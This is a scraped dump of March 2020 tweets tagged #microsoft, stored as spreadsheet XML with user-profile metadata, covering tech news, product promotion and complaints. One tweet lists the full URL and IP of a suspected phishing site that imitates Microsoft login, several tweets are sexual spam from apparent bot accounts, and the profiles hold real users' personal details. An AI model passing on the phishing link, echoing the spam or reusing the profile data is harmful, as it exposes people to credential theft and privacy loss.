https://t.co/j6w77WKbo7</t>
  </si>
  <si>
    <t>Sun Mar 01 14:37:44 +0000 2020</t>
  </si>
  <si>
    <t>#ubank #fail 
Outsources code to #proprietarysoftware platform of #microsoft where #accessibility is not honoured https://t.co/yVO6olxzFy</t>
  </si>
  <si>
    <t>Sun Mar 01 14:37:38 +0000 2020</t>
  </si>
  <si>
    <t>#Offer my #pork #pie in a #space that's #true, that's how my #wallpaper #grew.
#created #pattern #microsoft #paint #artwork  #drawing https://t.co/Nu7mc7mHLs</t>
  </si>
  <si>
    <t>{'id': 2399588824, 'id_str': '2399588824', 'name': 'davidwithdrawnO', 'screen_name': 'davidwithdrawn', 'location': 'Middlesbrough, England', 'description': '#davidwithdrawn real name #johndaniels Paints and draws also digital . member of Health Art Group,  ST. JOHNS  #SouthBank #Middlesbrough meet 10 till 3 Fridays', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 320, 'friends_count': 766, 'listed_count': 25, 'created_at': 'Mon Mar 10 14:25:46 +0000 2014', 'favourites_count': 49, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1428,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'http://pbs.twimg.com/profile_images/827104192900820992/SJ7rqjSO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/827104192900820992/SJ7rqjSO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2399588824/1411315639',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</si>
  <si>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14:33:20 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft @Windows  any idea what #Windows10  Photos app is up to? : ) #bug #memoryleak #microsoft #windows https://t.co/RzYS4bHwsT</t>
  </si>
  <si>
    <t>{'id': 862951825472880640, 'id_str': '862951825472880640', 'name': 'BÃ¡lint SzabÃ³', 'screen_name': 'seekingoptimal', 'location': '', 'description': 'Senior Software Engineer &amp; IT Consultant\nalways seeking the optimal...', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Fri May 12 08:45:22 +0000 2017', 'favourites_count': 22,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'http://pbs.twimg.com/profile_images/862954532103442438/0ucfu94t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/862954532103442438/0ucfu94t_normal.jpg',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</si>
  <si>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14:31:59 +0000 2020</t>
  </si>
  <si>
    <t>Cloud Giant Microsoft Azure Embraces Commercial Blockchain https://t.co/wQiA3NPin4 by @cointelegraph #Cloud #Tech #Microsoft #Blockchain</t>
  </si>
  <si>
    <t>Sun Mar 01 14:28:48 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> https://login-microsoftonline-com-common-oauth2.icsae.camdvr.org
Suspected #phishing #opendir
AS57043 [146.0.76.90]
Let's Encrypt Authority X3
Keywords: #login #online #microsoft
https://t.co/bQJd3qReWU</t>
  </si>
  <si>
    <t>Sun Mar 01 14:25:02 +0000 2020</t>
  </si>
  <si>
    <t>Fantastically organised @scottishsummit #Glasgow @Themarkchristie @Bearded365Guy   BIG thanks to volunteers, attendees, speakers, organisers for making it happen...until next time! #ss2020 #Office365 #Microsoft365 #MicrosoftTeams #SharePoint #PowerPlatform #Microsoft https://t.co/kuwfs52e0E</t>
  </si>
  <si>
    <t>{'id': 16854981, 'id_str': '16854981', 'name': 'Chirag Patel #SS2020 #globalcon1 #collab365', 'screen_name': 'techChirag', 'location': 'PatelConsulting.co.uk', 'description': 'Technology Consultant @PatelConsult | @Microsoft MCSE, CITP, TOGAF Architect | #Office365 #SharePoint #MicrosoftTeams #Microsoft365 #PowerPlatform', 'url': 'https://t.co/3JnWnFhML8', 'entities': {'url': {'urls': [{'url': 'https://t.co/3JnWnFhML8', 'expanded_url': 'http://techChirag.com', 'display_url': 'techChirag.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1310, 'friends_count': 352, 'listed_count': 196, 'created_at': 'Sun Oct 19 19:39:02 +0000 2008', 'favourites_count': 2674, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11167, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFF04D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1182972562818646018/LRxTt-31_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1182972562818646018/LRxTt-31_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16854981/1580645458', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'EDE6C1', 'profile_text_color': '190E07', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sun Mar 01 14:23:00 +0000 2020</t>
  </si>
  <si>
    <t>If sex, then for a long time. All night long #Norfolk   #microsoft #movie https://t.co/z8AWlTmsZ2</t>
  </si>
  <si>
    <t>{'id': 1234102632605769728, 'id_str': '1234102632605769728', 'name': 'Brandy Bailey', 'screen_name': 'gaubilece', 'location': 'Erie, USA', 'description': 'Absence makes the heart grow fonder.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 53, 'listed_count': 0, 'created_at': 'Sun Mar 01 13:06:15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'http://pbs.twimg.com/profile_images/1234120180617359360/ao2B7lF2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234120180617359360/ao2B7lF2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234102632605769728/1583072188',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</si>
  <si>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14:21:13 +0000 2020</t>
  </si>
  <si>
    <t>The average cost of a data breach is $3.6 million. Is your company prepared to deal with the aftermath of a cyberattack? Check out this infographic for more on how we can help protect your company. #Microsoft #cybersecurity https://t.co/phUfnjOHFG</t>
  </si>
  <si>
    <t>Sun Mar 01 14:19:00 +0000 2020</t>
  </si>
  <si>
    <t>MICROSOFT EXCEL - EXCEL FROM BEGINNER TO ADVANCED
=&amp;gt; https://t.co/fGAWkyg08r
#Microsoft #frontend #codinglife #html5 #ad #javascript #machinelearning #code #mysql #programming #developer #codenewbie #coding #javascript30 #100DaysOfCode #udemy #udemycoupon</t>
  </si>
  <si>
    <t>Sun Mar 01 14:16:49 +0000 2020</t>
  </si>
  <si>
    <t>CVE-2020-0688: #Microsoft #Exchange Server Static Key Flaw Could Lead to Remote Code Execution
#cyberexposure #cybersecurity #ciberseguridad https://t.co/hqmuPjUoSd</t>
  </si>
  <si>
    <t>{'id': 397775630, 'id_str': '397775630', 'name': 'Guillermo R. Gil', 'screen_name': 'Guillermorgil', 'location': 'GuaymallÃ©n, Argentina', 'description': 'SÃ³lo una cosa convierte en imposible un sueÃ±o: el miedo a fracasar.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 97, 'friends_count': 190, 'listed_count': 35, 'created_at': 'Tue Oct 25 04:15:24 +0000 2011', 'favourites_count': 53, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1191,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'http://pbs.twimg.com/profile_images/378800000720822243/228d642043d4ec942e031472e00b76e8_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000720822243/228d642043d4ec942e031472e00b76e8_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/397775630/1478022615',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</si>
  <si>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14:16:03 +0000 2020</t>
  </si>
  <si>
    <t>Surface Duo to hit market this summer #Microsoft #SurfaceDuo #Android https://t.co/rFonpD0P0W https://t.co/qsHAdh0TNZ</t>
  </si>
  <si>
    <t>{'id': 1077322427691077634, 'id_str': '1077322427691077634', 'name': 'Tech Lapse', 'screen_name': 'techlapsenews', 'location': '', 'description': 'Tech Lapse - Your Technology News Source. Dedicated to cover Global #technology news. Founded in 2018.', 'url': 'https://t.co/sTnFcUEdog', 'entities': {'url': {'urls': [{'url': 'https://t.co/sTnFcUEdog', 'expanded_url': 'https://techlapse.com', 'display_url': 'techlapse.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 61, 'friends_count': 3, 'listed_count': 2, 'created_at': 'Mon Dec 24 21:57:37 +0000 2018', 'favourites_count': 19, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1512,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'http://pbs.twimg.com/profile_images/1077322576827944960/ORcavv_B_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1077322576827944960/ORcavv_B_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1077322427691077634/1545688879',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</si>
  <si>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14:12:24 +0000 2020</t>
  </si>
  <si>
    <t>@XXXAmberLynns @yowhatthough Anyone can use a hashtag, just because you own a trademark does not mean you own the rights to a hashtag, it means no one can capitalize on your brand, but were not profiting off tweets. Watch: #mcdonalds #disney #microsoft, all trademarked, but none will throw a fit like you.</t>
  </si>
  <si>
    <t>{'id': 1175072505318596618, 'id_str': '1175072505318596618', 'name': 'JJ âœ¨', 'screen_name': 'peachybeing', 'location': 'somewhere, out there', 'description': 'they/them â 23 â lgbqt â I live like a worm and I like to play the drums â be kind to yourself â chronic illness warrior ðŸ‘ŠðŸ» â TERF free zone', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 47, 'listed_count': 0, 'created_at': 'Fri Sep 20 15:42:03 +0000 2019', 'favourites_count': 845, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 412, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1227361457370796033/bylVbYiw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227361457370796033/bylVbYiw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1175072505318596618/1575473502',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</si>
  <si>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14:11:55 +0000 2020</t>
  </si>
  <si>
    <t>Preparing #microsoft official course to teach interested people in #moderndesktop and #windowsautopilot starting next friday.
.
.
.
.
#md101 #intune #endpointmanager #moc #teaching #mct #microsoftcertifiedtrainer #thenewworld https://t.co/8i1Qe9EylB</t>
  </si>
  <si>
    <t>{'id': 934558565335027714, 'id_str': '934558565335027714', 'name': 'Doudisblog', 'screen_name': 'doudisblog', 'location': 'BÃ¶singen, Schweiz', 'description': 'doudisblog gives you information, help and guides about Microsoft products such as Exchange, Skype for Business and Office 365.', 'url': 'https://t.co/yRQ0zqMANF', 'entities': {'url': {'urls': [{'url': 'https://t.co/yRQ0zqMANF', 'expanded_url': 'https://www.doudi.ch', 'display_url': 'doudi.ch', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 19, 'listed_count': 0, 'created_at': 'Sat Nov 25 23:05:00 +0000 2017', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 44, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/935489127591628801/5lsEPpNo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/935489127591628801/5lsEPpNo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/934558565335027714/1511873099',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</si>
  <si>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14:08:38 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft rolls out new system icons to all Windows 10 users
#microsoft #iconsofmodernart  #icons2020  #windows10 #windows10x
https://t.co/oXssj14Ygy</t>
  </si>
  <si>
    <t>Sun Mar 01 14:06:04 +0000 2020</t>
  </si>
  <si>
    <t>Great news as Microsoft Surface Duo may launch as soon as Spring, and ship soon after
#microsoft #Surface  #microsoftsurface #surfaceneo
#holidayseason #laucnhdate
https://t.co/X3T8pq7suh</t>
  </si>
  <si>
    <t>Sun Mar 01 14:04:24 +0000 2020</t>
  </si>
  <si>
    <t>Been grinding lately Is this beat ?? #tricksofthetrade #dominusgang #dominus #rocketleaguenews #rlcs9 #rocketleaguetrade #rldesignz
#rlcs #rocketleague #xboxone #lilwayne #microsoft #rlfreestyle... https://t.co/l9SLAVXr3S</t>
  </si>
  <si>
    <t>{'id': 4890333747, 'id_str': '4890333747', 'name': 'Corey Marte', 'screen_name': 'Bronco_sensei', 'location': '', 'description': 'IG: Bronco_Sensei\n\nTwitch: BroncoSensei', 'url': 'https://t.co/C86sXBUG5y', 'entities': {'url': {'urls': [{'url': 'https://t.co/C86sXBUG5y', 'expanded_url': 'https://www.twitch.tv/broncosensei', 'display_url': 'twitch.tv/broncosensei', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10, 'friends_count': 23, 'listed_count': 0, 'created_at': 'Tue Feb 09 01:14:42 +0000 2016', 'favourites_count': 19, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1168494098216628224/twV7Ss2J_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168494098216628224/twV7Ss2J_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4890333747/1455015703',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</si>
  <si>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14:01:12 +0000 2020</t>
  </si>
  <si>
    <t>By 2030, global demand for water will surpass supply by 40%. That's why @Ecolab uses #Microsoft #Azure and #PowerBI to help customers produce better with much less water. https://t.co/hih10VPHrn</t>
  </si>
  <si>
    <t>Sun Mar 01 14:00:03 +0000 2020</t>
  </si>
  <si>
    <t>10 reasons you should stop waiting to jump on the #SharePoint train!  https://t.co/flSoi5krnB
#microsoft #sharepointonline #office365 #microsoft365 #collaboration https://t.co/WDTw0Jgjnz</t>
  </si>
  <si>
    <t>Sun Mar 01 13:59:26 +0000 2020</t>
  </si>
  <si>
    <t>#LatestNews #Microsoft Paint is finally dead, and the world Is a better place https://t.co/QmHtoXQttm #computers #tech</t>
  </si>
  <si>
    <t>{'id': 707316591453724673, 'id_str': '707316591453724673', 'name': 'instant.com.pk', 'screen_name': 'InstantNewsPk', 'location': 'Pakistan', 'description': 'https://t.co/WJLVnHf1zq is the all in one #1 News Network that gives you real-time World-Wide News in single every minute.', 'url': 'https://t.co/U5FfIFDcl4', 'entities': {'url': {'urls': [{'url': 'https://t.co/U5FfIFDcl4', 'expanded_url': 'https://instant.com.pk', 'display_url': 'instant.com.pk', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/WJLVnHf1zq', 'expanded_url': 'http://Instant.com.pk', 'display_url': 'Instant.com.pk', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 292, 'friends_count': 54, 'listed_count': 4, 'created_at': 'Tue Mar 08 21:26:31 +0000 2016', 'favourites_count': 16, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 143256,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'http://pbs.twimg.com/profile_images/1230399255057240064/Bdo8FyBd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230399255057240064/Bdo8FyBd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/707316591453724673/1582185019',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</si>
  <si>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13:50:29 +0000 2020</t>
  </si>
  <si>
    <t>I want to have sex the way I want #Crawford County   #free #microsoft https://t.co/2Emc7qAqmh</t>
  </si>
  <si>
    <t>{'id': 1233818036546818048, 'id_str': '1233818036546818048', 'name': 'Candace Jones', 'screen_name': 'becoposa', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 38, 'listed_count': 0, 'created_at': 'Sat Feb 29 18:15:23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'http://pbs.twimg.com/profile_images/1233934522015780864/sh94hbpc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233934522015780864/sh94hbpc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233818036546818048/1583009702',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</si>
  <si>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13:40:03 +0000 2020</t>
  </si>
  <si>
    <t>2020 is going to be another incredibly exciting year for everyone when it comes to technology. Our primary partner Microsoft has started it off by making an exceptionally bold pledge
https://t.co/YcGTrAKudA
#microsoft #microsoftpartner #technology #cloud #business #digital #cloud https://t.co/7YlPUiMc4v</t>
  </si>
  <si>
    <t>Sun Mar 01 13:40:01 +0000 2020</t>
  </si>
  <si>
    <t>#MicrosoftTeams is full of possibility for your organisation; but what should you do...and not do? Here are a few tips to get you started with the tool: https://t.co/N5GmqQ7ubc 
#MicrosoftTeamsHelp #Microsoft #Teams #Collaboration #Office365</t>
  </si>
  <si>
    <t>Sun Mar 01 13:37:55 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft new Edge browser is better than Chrome, it's light, fluid, yet feature rich https://t.co/M08Xq3SMzG</t>
  </si>
  <si>
    <t>Sun Mar 01 13:30:06 +0000 2020</t>
  </si>
  <si>
    <t>Driving #healthcare change by empowering tech intensity - Julie Sanford #Microsoft #HIMSS #Azure #FHIR https://t.co/zBaofDRDNY #MSFTAdvocate</t>
  </si>
  <si>
    <t>Sun Mar 01 13:30:04 +0000 2020</t>
  </si>
  <si>
    <t>Do you really want a folding phone? No me neither ! Surface Duo phone peek feature leaked, prodding all other foldables https://t.co/yRLG9NqGX5 #microsoft #smartphone #devices #tech #future https://t.co/xoEFVEp25S</t>
  </si>
  <si>
    <t>Sun Mar 01 13:29:28 +0000 2020</t>
  </si>
  <si>
    <t>Come to me and surprise me with your dick
https://t.co/AK5SwSqf2c
#Ontario
 #nature #microsoft https://t.co/Mk79LzTx7m</t>
  </si>
  <si>
    <t>{'id': 1234102858653536256, 'id_str': '1234102858653536256', 'name': 'Charity Brown', 'screen_name': 'enarrautrad', 'location': 'Billings, USA', 'description': 'Promise me youâ€™ll always remember: Youâ€™re braver than you believe, and stronger than you seem, and smarter than you think.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 41, 'listed_count': 0, 'created_at': 'Sun Mar 01 13:07:10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'http://pbs.twimg.com/profile_images/1234105892582428672/DnJIsk9I_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234105892582428672/DnJIsk9I_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234102858653536256/1583068967',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</si>
  <si>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13:29:13 +0000 2020</t>
  </si>
  <si>
    <t>Q: I enabled nested virtualization for a HV VM, but it lost network connectivity and I cannot use the mouse inside the console. How can I fix it? #Microsoft #HyperV https://t.co/4hu1aBvLJg</t>
  </si>
  <si>
    <t>Sun Mar 01 13:26:36 +0000 2020</t>
  </si>
  <si>
    <t>Attackers probing for vulnerable Microsoft Exchange Servers, is yours one of them?
 https://t.co/3oYdbhcgmB #microsoft has deliberate back doors https://t.co/fug0FsaCh0</t>
  </si>
  <si>
    <t>Sun Mar 01 13:24:35 +0000 2020</t>
  </si>
  <si>
    <t>Signal becomes European Commissions messaging app of choice in security clampdown https://t.co/6hinr2gViw will they dump #microsoft #proprietarysoftware next?</t>
  </si>
  <si>
    <t>Sun Mar 01 13:16:28 +0000 2020</t>
  </si>
  <si>
    <t>4 tips for easily managing multi-entity accounting | Gravity Software https://t.co/aeNOCl9ZNv by @vsilvani
#RemoteWork #Mobile #Applications #Microsoft #PowerBI #Patrons #Hospitality #BillingSoftware #MultiSite #Companies #franchise #CRM #ERP #BetterTogether #Restaurants https://t.co/EoKuDQh764</t>
  </si>
  <si>
    <t>Sun Mar 01 13:16:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Weekly: Xbox's new Home, a peek at Surface Duo, and new builds for everyone #MicrosoftWeekly #Microsoft https://t.co/41labtpDlb https://t.co/C1m9F2uV5F</t>
  </si>
  <si>
    <t>Sun Mar 01 13:14:12 +0000 2020</t>
  </si>
  <si>
    <t>Not that #Microsoft would give much of a damn if their #Xbox console update bricked it or not only myself and maybe @Kendareru or @KhaosLily133 would</t>
  </si>
  <si>
    <t>{'id': 878793973, 'id_str': '878793973', 'name': 'jason', 'screen_name': 'Reapers_Ghost89', 'location': 'Billings, MT', 'description': 'Gunsmithing gamer follow my Mixer or Twitch when I broadcast Iâ€™m mostly on Destiny 2 @ https://t.co/4t4lJfHHZ1 https://t.co/Fqw2EGHpVg', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/4t4lJfHHZ1', 'expanded_url': 'http://mixer.com/Reapers_Ghost89', 'display_url': 'mixer.com/Reapers_Ghost89', 'indices': [87, 110]}, {'url': 'https://t.co/Fqw2EGHpVg', 'expanded_url': 'http://twitch.tv/reapers_ghost89', 'display_url': 'twitch.tv/reapers_ghost89', 'indices': [111, 134]}]}}, 'protected': False, 'followers_count': 7, 'friends_count': 15, 'listed_count': 1, 'created_at': 'Sat Oct 13 22:05:07 +0000 2012', 'favourites_count': 41, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 176,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'http://pbs.twimg.com/profile_images/1045937032353079296/zbdPAcRi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1045937032353079296/zbdPAcRi_normal.jpg',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</si>
  <si>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13:13:23 +0000 2020</t>
  </si>
  <si>
    <t>Sweet and depraved dreams to you! #Madison Heights   #heels #microsoft https://t.co/nzu1S5eQ34</t>
  </si>
  <si>
    <t>{'id': 1234043008485601280, 'id_str': '1234043008485601280', 'name': 'Joanna Thomas', 'screen_name': 'weitimichting', 'location': 'Mobile, USA', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 68, 'listed_count': 0, 'created_at': 'Sun Mar 01 09:09:21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'http://pbs.twimg.com/profile_images/1234045159928664065/32HNo4Pz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234045159928664065/32HNo4Pz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234043008485601280/1583054300',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</si>
  <si>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13:13:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft in October last year showcased a foldable #smartphone Surface Duo and now a new report claims that the tech giant may release the dual-screen #Android phone months earlier than anticipated.
https://t.co/LtP3hGfOD6</t>
  </si>
  <si>
    <t>Sun Mar 01 13:12:41 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft satellite #whitesource now attacks #freesw using the scam Microsoft calls "InnerSource" 
"How Open Source Best Practices Are Helping Enterprise Development Teams"
Guess who promotes this...
Yes, them: https://t.co/ngnM9WgSK3</t>
  </si>
  <si>
    <t>Sun Mar 01 13:10:03 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> The world is developing a #cybercurtain between a #US led #digital #economy dominated by #Apple, #Microsoft, #Google, #Facebook, #Amazon and #Netflix, and a #Chinese led system dominated by #Tencent, #Baidu and #Alibaba.  Find out more  https://t.co/tmvDILhElT https://t.co/XRUHYloc7d</t>
  </si>
  <si>
    <t>Sun Mar 01 13:09:21 +0000 2020</t>
  </si>
  <si>
    <t>Row Level Security (RLS) - get more control over your data https://t.co/9qdKq70NnN #Microsoft</t>
  </si>
  <si>
    <t>Sun Mar 01 13:03:15 +0000 2020</t>
  </si>
  <si>
    <t>Join the Robert Half Technology team! See our latest #Microsoft job openings, including "VB NET Developer", via the link in our bio. #Exton, PA</t>
  </si>
  <si>
    <t>{'id': 24551332, 'id_str': '24551332', 'name': 'TMJ-PHL IT-.NET Jobs', 'screen_name': 'tmj_phl_itdnet', 'location': 'Philadelphia, PA', 'description': 'Follow this account for geo-targeted Software Dev.  - Microsoft Tools job tweets in Philadelphia, PA. Need help? Tweet us at @CareerArc!', 'url': 'https://t.co/BStDeJg0Jf', 'entities': {'url': {'urls': [{'url': 'https://t.co/BStDeJg0Jf', 'expanded_url': 'http://bit.ly/2FiGn2B', 'display_url': 'bit.ly/2FiGn2B', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 203, 'friends_count': 166, 'listed_count': 10, 'created_at': 'Sun Mar 15 17:10:44 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4,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'http://pbs.twimg.com/profile_images/682124642253848577/OloGXMb4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/682124642253848577/OloGXMb4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24551332/1451466164',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</si>
  <si>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Sun Mar 01 13:02:05 +0000 2020</t>
  </si>
  <si>
    <t>Make me be your bitch. #Hunterdon County   #escort #microsoft https://t.co/fJElbFCPB0</t>
  </si>
  <si>
    <t>{'id': 1234077039352832001, 'id_str': '1234077039352832001', 'name': 'Sherri Rodriguez', 'screen_name': 'talkrecamour', 'location': 'Fargo, USA', 'description': 'You are my best friend, my human diary and my other half. You mean the world to me and I LOVE YOU.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 62, 'listed_count': 0, 'created_at': 'Sun Mar 01 11:24:35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'http://pbs.twimg.com/profile_images/1234079476650270721/TMQTNIMX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234079476650270721/TMQTNIMX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234077039352832001/1583062537',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</si>
  <si>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13:01:16 +0000 2020</t>
  </si>
  <si>
    <t>Put today's data explosion to work for your business with #Microsoft #PowerBI and #Azure. Place data at your entire organization's fingertips, enabling anyone to transform business data into actionable insights. Subscribe now. https://t.co/kiLyRCQPPj</t>
  </si>
  <si>
    <t>{'id': 16423257, 'id_str': '16423257', 'name': 'Airnet Group', 'screen_name': 'airnetgroup', 'location': 'Chattanooga, TN', 'description': 'Microsoft Gold Cloud &amp; Cloud Solution Provider helping improve efficiency, reliability, security &amp; maintenance of the cloud. #Airnet #Cloud #ITAssessment #Azure', 'url': 'http://t.co/wtTajq7ujP', 'entities': {'url': {'urls': [{'url': 'http://t.co/wtTajq7ujP', 'expanded_url': 'http://www.airnetgroup.com', 'display_url': 'airnetgroup.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 389, 'friends_count': 796, 'listed_count': 17, 'created_at': 'Tue Sep 23 18:48:28 +0000 2008', 'favourites_count': 279, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 579,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'http://pbs.twimg.com/profile_images/1095751663489609728/V9zTuN-f_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1095751663489609728/V9zTuN-f_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16423257/1500062310', 'profile_link_color': 'ED8B00',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</si>
  <si>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Sun Mar 01 13:00:37 +0000 2020</t>
  </si>
  <si>
    <t>Go into the tennis court again and smash your way through the championships in Smash Court Tennis 3 https://t.co/syHgO3Ai3r #microsoft #xbox360 #fun #gamer #tennis https://t.co/N0TCtAfet0</t>
  </si>
  <si>
    <t>Sun Mar 01 13:00:32 +0000 2020</t>
  </si>
  <si>
    <t>Sort of #BoringAI but very useful -  Use Azure Cognitive Services to automate forms processing https://t.co/AATNcnxjNJ #ai #ArtificialInteligence #azure #cloud #MachineLearning #microsoft https://t.co/9po08VdXlz</t>
  </si>
  <si>
    <t>Sun Mar 01 13:00:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft strategy with Azure #ArtificialIntelligence
#AI #BigData #ArtificialIntelligence #ML #healthcare
@TheMegaTrends @TopCyberNews @Ronald_vanLoon @alvinfoo @InsaneTech_ @maxjcm @JBarbosaPR @Julez_Norton @CaseyCRL
https://t.co/8ie1NX5Z3e</t>
  </si>
  <si>
    <t>{'id': 313525664, 'id_str': '313525664', 'name': 'John C. Maxwell III', 'screen_name': 'maxjcm', 'location': '', 'description': 'Investor #AI #Blockchain #Fintech, Speaker, Author, Father, Sailor  https://t.co/K7IUUw8Kut', 'url': 'https://t.co/6CmUFVsEOS', 'entities': {'url': {'urls': [{'url': 'https://t.co/6CmUFVsEOS', 'expanded_url': 'http://www.constellationpartners.net/', 'display_url': 'constellationpartners.net', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/K7IUUw8Kut', 'expanded_url': 'http://paper.li/maxjcm/1360812539', 'display_url': 'paper.li/maxjcm/1360812â€¦', 'indices': [68, 91]}]}}, 'protected': False, 'followers_count': 9332, 'friends_count': 6031, 'listed_count': 1384, 'created_at': 'Wed Jun 08 19:56:30 +0000 2011', 'favourites_count': 5146, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 28247, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'E6D9B2', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/792090957294473216/Y_csGnOy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/792090957294473216/Y_csGnOy_normal.jpg', 